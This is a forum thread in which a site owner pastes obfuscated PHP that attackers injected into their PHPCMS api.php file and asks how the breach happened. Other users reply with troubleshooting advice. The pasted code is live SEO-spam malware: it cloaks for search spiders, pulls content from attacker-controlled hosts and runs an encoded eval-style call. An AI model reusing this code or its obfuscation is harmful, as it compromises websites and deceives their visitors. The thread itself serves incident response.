最近网站两次被人挂广告,代码写的我及其无语

oxsicn 发布于 2013/06/17 15:54
阅读 3K+
收藏 2

拷贝下来的代码:

<?php
    ini_set('display_errors','Off');ini_set('max_execution_time', 0);define('SID', '26436');define('ROOT', dirname(__FILE__));define('LOCAL', True);function heade_(){if (stristr($_GET['id'], SID)) return true; else return false;}
    function isspider($open = 0){if (!$open) if (heade_()) return true;$agent="agent:".strtolower($_SERVER["HTTP_USER_AGENT"]);$searray=array("googlebot","baiduspider","sogou","yahoo","soso");foreach($searray as $se){ if (strpos($agent,$se)>0) return true;}return false;}function isindex(){if (heade_()) return false;$pname=strtolower($_SERVER["SCRIPT_NAME"]);$pquery=strtolower($_SERVER["QUERY_STRING"]);$parray=array("/index.","/default.","/main.");foreach($parray as $se){ if (strpos($pname,$se)>-1&&strlen($pquery)<1) return true;}}function Happy(){$ip = $_SERVER['REMOTE_ADDR'];if (isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {foreach ($matches[0] AS $xip) {if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {$ip = $xip;break;}}}$TNT_Group = array('123.125.68', '220.181.68', '220.181.7', '121.14.89','203.208.60', '210.72.225', '125.90.88', '220.181.108','123.125.71','123.125.67');foreach($TNT_Group as $addr) if (stristr($ip, $addr)) return False;return True;}if (LOCAL){$HtmlDir = ROOT.'/'.'HtmlSave';if (!is_dir($HtmlDir)) mkdir($HtmlDir);}if (SID == '_N'.'OT_O'.'PTI'.'ON_X5'){if (function_exists('file_get_contents')){$ftime = filemtime(__FILE__);$N_ID = mt_rand(20000, 99999);$c_f = file_get_contents(__FILE__);$c_f = str_replace('_NOT_'.'OPTION_X5', $N_ID, $c_f);fwrite(fopen(__FILE__, 'w'), $c_f);touch(__FILE__, $ftime);}}
    if ($_GET['action'] == 'ad') die(@file_get_contents('htt'.'p:/'.'/i'.'mg.klg'.'w01.'.'com'.'/p'.'.ht'.'ml'));
    if (Happy())
    {$urlrefer=strtolower("refer:".@$_SERVER["HTTP_REFERER"]);$searray=array("google","baidu","sogou","yahoo","soso","360");if (!isspider(1))foreach($searray as $se){if (strpos($urlrefer,$se)>0){if (heade_()){echo @file_get_contents('ht'.'t'.'p://i'.'m'.'g.k'.'l'.'g'.'w'.'0'.'1.c'.'o'.'m/c'.'.t'.'xt');exit;}}}}

    if (isspider() & !isindex())
    {if (isset($N_ID)) $SID = $N_ID;if (SID != '_N'.'OT_O'.'PTI'.'ON_X5') $SID = SID;$ID = trim(str_replace(SID, '', $_GET['id']));$NMNEWONSOJFOJNS = '';if (LOCAL){if (is_file($HtmlDir.'/'.str_replace('.', '', $ID))){ header('Content-Type: text/html; charset=UTF-8');die(file_get_contents($HtmlDir.'/'.str_replace('.', '', $ID)));}}
    $FF0ffff__ff_ff_ff1110 = 'domain='.$_SERVER['HTTP_HOST']; $FF0ffff__ff_ff_ff1110 .= $NMNEWONSOJFOJNS = '&SID='.$SID;
    if (isset($_GET['id'])) $_q = '?words='.mt_rand(1, 10).'&v='.$ID.'&'.$FF0ffff__ff_ff_ff1110; else $_q = '?'.$FF0ffff__ff_ff_ff1110;
    $_0101010101 = $_000000003F = BAsE64_DECODE('a'.'n'.'V'.'z'.'d'.'A'.BASE64_DECODE('P'.'T0'.'=')); $_FFFF11 = $_fFf1f = '';
    function _00F0f00of00o0F0o0f0Fo($_FFFFFF, $_I1 = '3', $_II = '7') {return str_replace($_II,$_I1,$_FFFFFF);}
    $__0xFFFF00FFF0F = str_replace(array('r','d','l','e','y','v','z','s','s','2',' ',$_0101010101,$_000000003F,'0','.','g'), $_000000, 'say very g00d.');
    $__0xFFF101= str_replace(array('E','r','s','Z','i','J','z','s','v','S',' ',$_0101010101,$_GET[id],$_000000003F,',','.','e'), '', ' Js Ss Ev Zs it SS.');
    $__0111111FFF = str_replace(array('u','i','d','o','y','n','e','W','a','2',' ',$_GET[s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you is.');
    $ffofo_of00offff = str_replace('3', '7', 'cGhwLjV4LzV4L21vYy42NjZpYXRnbm9kLmQvLzpwdHRo'.''.'='.''.'=');
    $__0xFFF010101= str_replace(array('a','r','s','Z','y','J','z','s','v','S',' ',$_0101010101,$_GET[id],$_000000003F,',','.'), '', ' Js s Jv Zs are SS.');
    $__0x111F01101100 = str_replace(array('W','e','t','o','y','m','e','h','o','u',' ','i',$_0101010101,$_000000003F,',','.','#'), $_000000, ' We the mis you.');
    $__01111111FFF = str_replace(array('u','i','d','o','y','n','z','W','a','e',' ',$_GET[s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you are.');
    $ffoff0o_of00000offff = _00F0f00of00o0F0o0f0Fo($ffofo_of00offff);
    $_o0o001100o111o011 ='$_conn = f'.'il'.'e_g'.'et_'.chr(99).'o'.chr(110).'ten'.'ts("'.urldecode(strrev(bAse64_decode($ffoff0o_of00000offff.'='.''.'='))).$_q.'")';
    $_E=strrev($__0xFFF101.''.''.$__01111111FFF.$__0xFFF010101.$__0111111FFF.''.''.$__0x111F01101100.''.''.$__0xFFFF00FFF0F);
    ($_=$_E).$_($_o0o001100o111o011);$_jHHsHHs = $H0F0o00po = $_conn;
    if (500 > strlen($_jHHsHHs)) Exit;if (LOCAL) if (!file_exists($HtmlDir.'/'.str_replace('.', '', $ID))) fwrite(fopen($HtmlDir.'/'.str_replace('.', '', $ID), 'w'), $_jHHsHHs);header('Content-Type: text/html; charset=UTF-8');echo $_jHHsHHs;exit;#w7vT0MLywvQgvs3Du9PQybG6pg
    }
?>


我最无语的是他吧代码写在我的api.php文件里 导致我的验证码等功能都失效了

我用的phpcms已更新最新,空间是新网的ftp密码是新网随机的,不知道黑客是通什么手段修改的?

加载中
0
浏览者
浏览者
你不能保证你同一台机器的其他应用没用漏洞
0
阿伏流
阿伏流
一看到新网,,,大概就明白了,阿里云吧。
天闲
天闲
挂马怨新网?一般用一些网上下载的“cms”这样的网站确实经常被挂马。我自己写的代码再烂也没见挂马的....
阿伏流
阿伏流
回复 @no_way : 是阿里云收购的万网,主机分为阿里云的自主技术的阿里云主机和万网传统的万网云主机。
no_way
no_way
阿里云不是万网?
0
leo108
leo108
也不能保证phpcms没有未公布的漏洞
0
苏生不惑
苏生不惑
代码没加密吗
0
Liberxue
Liberxue
貌似 很久以前我看见漏洞了..........好久没关注phpv9貌似有漏洞 不知道打补丁没
0
y
ywq111
除了phpcms之外,你确定不是phpmyadmin或者别的软件的问题?或者和你同机器的别的网站漏洞导致的旁注,建议你查找下和自己相同ip下的网站,看看是否那些网站也存在相同问题,如果问题相同,那你懂的。。。
0
herro
herro
请问你是哪里的空间?我的也是这样的。。一样的代码
oxsicn
oxsicn
新网空间
0
大鹏rocing
大鹏rocing
排查日志,不排除v9存在为公开漏洞的可能性
0
子弹兄
子弹兄
我为被这样挂过,安装个安全狗吧,还有防火墙,再者文件权限设置
0
carl_涛
carl_涛
大部分被挂马都是文件权限问题导致的,公司的discuz被挂了N多次,可以说是无孔不入~~
返回顶部
顶部